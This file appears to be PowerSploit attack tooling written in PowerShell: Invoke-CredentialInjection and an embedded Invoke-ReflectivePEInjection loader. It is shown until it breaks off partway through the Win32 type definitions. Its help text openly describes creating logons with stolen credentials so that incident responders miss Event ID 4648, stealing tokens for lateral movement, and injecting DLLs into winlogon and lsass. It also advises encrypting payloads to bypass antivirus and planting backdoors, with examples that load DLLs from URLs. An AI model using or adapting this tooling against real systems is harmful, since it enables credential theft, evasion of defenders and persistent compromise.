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function Invoke-CredentialInjection
{
<#
.SYNOPSIS
This script allows an attacker to create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).
The script either creates a suspended winlogon.exe process running as SYSTEM, or uses an existing WinLogon process. Then, it injects a DLL in to
winlogon.exe which calls LsaLogonUser to create a logon from within winlogon.exe (which is where it is called from when a user logs in using RDP or
logs on locally). The injected DLL then impersonates the new logon token with its current thread so that it can be kidnapped using Invoke-TokenManipulation.
PowerSploit Function: Invoke-CredentialInjection
Author: Joe Bialek, Twitter: @JosephBialek
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
This script allows an attacker to create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).
The script either creates a suspended winlogon.exe process running as SYSTEM, or uses an existing WinLogon process. Then, it injects a DLL in to
winlogon.exe which calls LsaLogonUser to create a logon from within winlogon.exe (which is where it is called from when a user logs in using RDP or
logs on locally). The injected DLL then impersonates the new logon token with its current thread so that it can be kidnapped using Invoke-TokenManipulation.
.PARAMETER NewWinLogon
Switch. Specifies that this script should create a new WinLogon.exe process. This may be suspicious, as log correlation can show winlogon.exe was
created by PowerShell.exe. This CANNOT be used if the script is run from Session 0 (winlogon requires a desktop is available, and session 0 doesn't have one).
.PARAMETER ExistingWinLogon
Switch. Specifies that this script should use an existing WinLogon.exe process. This will leave behind code (a reflectively loaded DLL) in the process.
.PARAMETER DomainName
The domain name of the user account.
.PARAMETER UserName
The username to log in with.
.PARAMETER Password
The password of the user.
.PARAMETER LogonType
The logon type of the injected logon. Can be Interactive, RemoteInteractive, or NetworkCleartext
.PARAMETER AuthPackage
The authentication package to use. Default is Kerberos. Msv1_0 can be specified but should only be used for local accounts (which can't use kerberos).
.EXAMPLE
Invoke-CredentialInjection -DomainName "demo" -UserName "administrator" -Password "Password1" -NewWinLogon
Creates a new winlogon process (as the SYSTEM account) and creates a logon from within the process as demo\administrator. The logon will default to
RemoteInteractive (an RDP logon). Defaults to using the Kerberos provider.
.EXAMPLE
Invoke-CredentialInjection -DomainName "demo" -UserName "administrator" -Password "Password1" -ExistingWinLogon -LogonType NetworkCleartext
Uses an existing winlogon process and creates a loogn from within it as demo\administrator. The logon will be type NetworkCleartext (used in basic auth
and PowerShell w/ CredSSP). Defaults to using the Kerberos provider.
.EXAMPLE
Invoke-CredentialInjection -DomainName "demo" -UserName "administrator" -Password "Password1" -NewWinLogon -AuthPackage Msv1_0
Creates a new winlogon process (as the SYSTEM account) and creates a logon from within the process as demo\administrator. The logon will default to
RemoteInteractive (and RDP logon). The logon will use the Msv1_0 auth package (NTLM).
.NOTES
Normally when you do a RunAS logon, the EventID 4648 will show your current account, current process, and the account you are logging in with.
Incident responders use this to look for lateral movement. They can see a random user logging in with high privilege credentials, which stands out.
This script allows you to create the logon from within winlogon.exe, as SYSTEM. This allows you to create 4648 event logs which make it appear that the
user logged in using RDP or logged in locally, rather than the logon showing up as a suspicious RunAS. Then you can use token kidnapping, such as the
Invoke-TokenManipulation script to kidnap the security token. This token can then be used to authenticate over the network for pivoting and other post
exploitation.
.LINK
Blog: http://clymb3r.wordpress.com/
Github repo: https://github.com/clymb3r/PowerShell
#>
[CmdletBinding()]
Param(
[Parameter(ParameterSetName = "NewWinLogon", Position = 0)]
[Switch]
$NewWinLogon,
[Parameter(ParameterSetName = "ExistingWinLogon", Position = 0)]
[Switch]
$ExistingWinLogon,
[Parameter(Position=1, Mandatory=$true)]
[String]
$DomainName,
[Parameter(Position=2, Mandatory=$true)]
[String]
$UserName,
[Parameter(Position=3, Mandatory=$true)]
[String]
$Password,
[Parameter()]
[ValidateSet("Interactive","RemoteInteractive", "NetworkCleartext")]
[String]
$LogonType = "RemoteInteractive",
[Parameter()]
[ValidateSet("Kerberos","Msv1_0")]
[String]
$AuthPackage = "Kerberos"
)
Set-StrictMode -Version 2
function Invoke-ReflectivePEInjection
{
<#
.SYNOPSIS
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please lead the Notes section (GENERAL NOTES) for information on how to use them.
1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.
Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process.
This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system,
this will load and execute the DLL/EXE in to memory without writing any files to disk.
2.) Reflectively load a DLL in to memory of a remote process.
As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process.
This is probably most useful for injecting backdoors in SYSTEM processes in Session0. Currently, you cannot retrieve output
from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the
remote process.
While this script provides functionality to specify a file to load from disk or from a URL, these are more for demo purposes. The way I'd recommend using the script is to create a byte array
containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will
bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba
blog linked below (thanks to whitey).
PowerSploit Function: Invoke-ReflectivePEInjection
Author: Joe Bialek, Twitter: @JosephBialek
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 1.1
.DESCRIPTION
Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.
.PARAMETER PEPath
The path of the DLL/EXE to load and execute. This file must exist on the computer the script is being run on, not the remote computer.
.PARAMETER PEUrl
A URL containing a DLL/EXE to load and execute.
.PARAMETER ComputerName
Optional, an array of computernames to run the script on.
.PARAMETER FuncReturnType
Optional, the return type of the function being called in the DLL. Default: Void
Options: String, WString, Void. See notes for more information.
IMPORTANT: For DLLs being loaded remotely, only Void is supported.
.PARAMETER ExeArgs
Optional, arguments to pass to the executable being reflectively loaded.
.PARAMETER ProcName
Optional, the name of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this.
.PARAMETER ProcId
Optional, the process ID of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this.
.EXAMPLE
Load DemoDLL from a URL and run the exported function WStringFunc on the current system, print the wchar_t* returned by WStringFunc().
Note that the file name on the website can be any file extension.
Invoke-ReflectivePEInjection -PEUrl http://yoursite.com/DemoDLL.dll -FuncReturnType WString
.EXAMPLE
Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc().
Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName Target.local
.EXAMPLE
Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print
the wchar_t* returned by WStringFunc() from all the computers.
Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)
.EXAMPLE
Load DemoEXE and run it locally.
Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4"
.EXAMPLE
Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer.
Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local
.NOTES
GENERAL NOTES:
The script has 3 basic sets of functionality:
1.) Reflectively load a DLL in to the PowerShell process
-Can return DLL output to user when run remotely or locally.
-Cleans up memory in the PS process once the DLL finishes executing.
-Great for running pentest tools on remote computers without triggering process monitoring alerts.
-By default, takes 3 function names, see below (DLL LOADING NOTES) for more info.
2.) Reflectively load an EXE in to the PowerShell process.
-Can NOT return EXE output to user when run remotely. If remote output is needed, you must use a DLL. CAN return EXE output if run locally.
-Cleans up memory in the PS process once the DLL finishes executing.
-Great for running existing pentest tools which are EXE's without triggering process monitoring alerts.
3.) Reflectively inject a DLL in to a remote process.
-Can NOT return DLL output to the user when run remotely OR locally.
-Does NOT clean up memory in the remote process if/when DLL finishes execution.
-Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory.
-Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded.
DLL LOADING NOTES:
PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output.
If you need to get back the output from the PE file you are loading on remote computers, you must compile the PE file as a DLL, and have the DLL
return a char* or wchar_t*, which PowerShell can take and read the output from. Anything output from stdout which is run using powershell
remoting will not be returned to you. If you just run the PowerShell script locally, you WILL be able to see the stdout output from
applications because it will just appear in the console window. The limitation only applies when using PowerShell remoting.
For DLL Loading:
Once this script loads the DLL, it calls a function in the DLL. There is a section near the bottom labeled "YOUR CODE GOES HERE"
I recommend your DLL take no parameters. I have prewritten code to handle functions which take no parameters are return
the following types: char*, wchar_t*, and void. If the function returns char* or wchar_t* the script will output the
returned data. The FuncReturnType parameter can be used to specify which return type to use. The mapping is as follows:
wchar_t* : FuncReturnType = WString
char* : FuncReturnType = String
void : Default, don't supply a FuncReturnType
For the whcar_t* and char_t* options to work, you must allocate the string to the heap. Don't simply convert a string
using string.c_str() because it will be allocaed on the stack and be destroyed when the DLL returns.
The function name expected in the DLL for the prewritten FuncReturnType's is as follows:
WString : WStringFunc
String : StringFunc
Void : VoidFunc
These function names ARE case sensitive. To create an exported DLL function for the wstring type, the function would
be declared as follows:
extern "C" __declspec( dllexport ) wchar_t* WStringFunc()
If you want to use a DLL which returns a different data type, or which takes parameters, you will need to modify
this script to accomodate this. You can find the code to modify in the section labeled "YOUR CODE GOES HERE".
Find a DemoDLL at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectiveDllInjection
.LINK
Blog: http://clymb3r.wordpress.com/
Github repo: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectivePEInjection
Blog on reflective loading: http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/
Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/
Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/
#>
[CmdletBinding()]
Param(
[Parameter(Mandatory = $true)]
[Byte[]]
$Bytes32,
[Parameter(Mandatory = $true)]
[Byte[]]
$Bytes64,
[Parameter(Position = 1)]
[String[]]
$ComputerName,
[Parameter(Position = 2)]
[ValidateSet( 'WString', 'String', 'Void' )]
[String]
$FuncReturnType = 'Void',
[Parameter(Position = 3)]
[String]
$ExeArgs,
[Parameter(Position = 4)]
[Int32]
$ProcId,
[Parameter(Position = 5)]
[String]
$ProcName
)
Set-StrictMode -Version 2
$RemoteScriptBlock = {
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $true)]
[Byte[]]
$PEBytes,
[Parameter(Position = 1, Mandatory = $false)]
[String]
$FuncReturnType,
[Parameter(Position = 2, Mandatory = $false)]
[Int32]
$ProcId,
[Parameter(Position = 3, Mandatory = $false)]
[String]
$ProcName
)
###################################
########## Win32 Stuff ##########
###################################
Function Get-Win32Types
{
$Win32Types = New-Object System.Object
#Define all the structures/enums that will be used
# This article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html
$Domain = [AppDomain]::CurrentDomain
$DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
$ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
############ ENUM ############
#Enum MachineType
$TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])
$TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null
$TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null
$TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null
$TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null
$MachineType = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType
#Enum MagicType
$TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
$TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
$MagicType = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType
#Enum SubSystemType
$TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null
$SubSystemType = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType
#Enum DllCharacteristicsType
$TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])
$TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null
$TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null
$TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null
$TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null
$TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null
$DllCharacteristicsType = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType
########### STRUCT ###########
#Struct IMAGE_DATA_DIRECTORY
$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)
($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
$IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY
#Struct IMAGE_FILE_HEADER
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)
$TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
$IMAGE_FILE_HEADER = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER
#Struct IMAGE_OPTIONAL_HEADER64
$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)
($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null
($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null
($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null
($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null
($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null
($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null
($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null
($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null
$IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64
#Struct IMAGE_OPTIONAL_HEADER32
$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)
($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null
($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null
($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null
($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null
($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null
($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null
($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null
($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null
($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null
($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null
($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
$IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32
#Struct IMAGE_NT_HEADERS64
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)
$TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
$TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null
$IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64
#Struct IMAGE_NT_HEADERS32
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)
$TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
$TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null
$IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()
